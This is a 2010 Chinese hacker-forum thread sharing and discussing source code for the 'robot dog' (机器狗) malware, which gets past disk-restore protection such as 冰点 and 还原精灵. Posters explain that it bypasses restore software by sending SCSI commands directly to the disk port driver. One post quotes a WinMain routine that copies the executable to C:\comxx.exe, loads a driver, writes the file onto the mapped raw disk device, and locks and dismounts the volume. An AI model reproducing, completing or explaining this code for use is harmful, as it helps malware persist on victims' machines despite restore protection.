机器狗代码
本帖最后由 乔丹二世 于 2010-9-2 18:59 编辑也是从PUDN上下载的
放在硬盘里独乐乐不如放到论坛上众乐乐
顺便赚点水晶币:victory: 下载一个
再给你加点钱 传说中穿还原的东东......
那个时候把冰点,还原精灵啥的搞惨了....... 我这几天就在处理这问题
我们的还原被第六代机器狗穿透了。。。。。 有什么特殊的地方没!?好像以前也看到一份。 这个直接就是SCSI命令去直接操作磁盘端口驱动而已,也没啥特别的。。。。绕过了磁盘类驱动,而多数还原(95%以上,估计)是基于磁盘卷设备的,所以,也就穿透了还原 我这几天就在处理这问题
我们的还原被第六代机器狗穿透了。。。。。
364589886 发表于 2010-9-8 21:41 http://www.m5home.com/bbs/images/common/back.gif
。。。。。现在还在玩?这个作者真是。。。。。。。。 我觉得作者不是同一人了 谁解释下到底是怎么回事啊!?
是怎么穿的呢?
把现有的一个文件复制到某个地方? int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
CHAR szmyname;
_tcsncpy(g_MyDriverName,_T("zzyyzz"),MAX_PATH);
_hInstance = GetModuleHandle(NULL);
m_hDevice = INVALID_HANDLE_VALUE;
m_init = FALSE;
GetModuleFileName(NULL,szmyname,MAX_PATH);
CopyFile(szmyname,"C:\\comxx.exe",FALSE);
loaddriver();
if(MapDisk())
{
OutputDebugStringA("ok");
HANDLE m_xxx;
DWORD dwRet;
if(CopyFile("C:\\comxx.exe","\\\\.\\yyy2\\comxx.exe",FALSE))
OutputDebugStringA("okok");
else
OutputDebugStringA("fuck");
m_xxx = CreateFile(
"\\\\.\\yyy2",
GENERIC_READ|GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
0);
FlushFileBuffers(m_xxx);
if(DeviceIoControl(m_xxx,FSCTL_LOCK_VOLUME,NULL,0,NULL,0,&dwRet,0))
{
if(DeviceIoControl(m_xxx,FSCTL_DISMOUNT_VOLUME,NULL,0,NULL,0,&dwRet,0))
{
DeviceIoControl(m_xxx,FSCTL_UNLOCK_VOLUME,NULL,0,NULL,0,&dwRet,0);
}
}
//DeviceIoControl(m_xxx,IOCTL_CLOSE_DISK,NULL,0,NULL,0,&dwRet,0);
CloseHandle(m_xxx);
}
else
{
OutputDebugStringA("failed");
}
return 0;
}
这段是不是将"C:\\comxx.exe"穿还原的意思?
那要怎么样才可以实现启动呢?
页:
[1]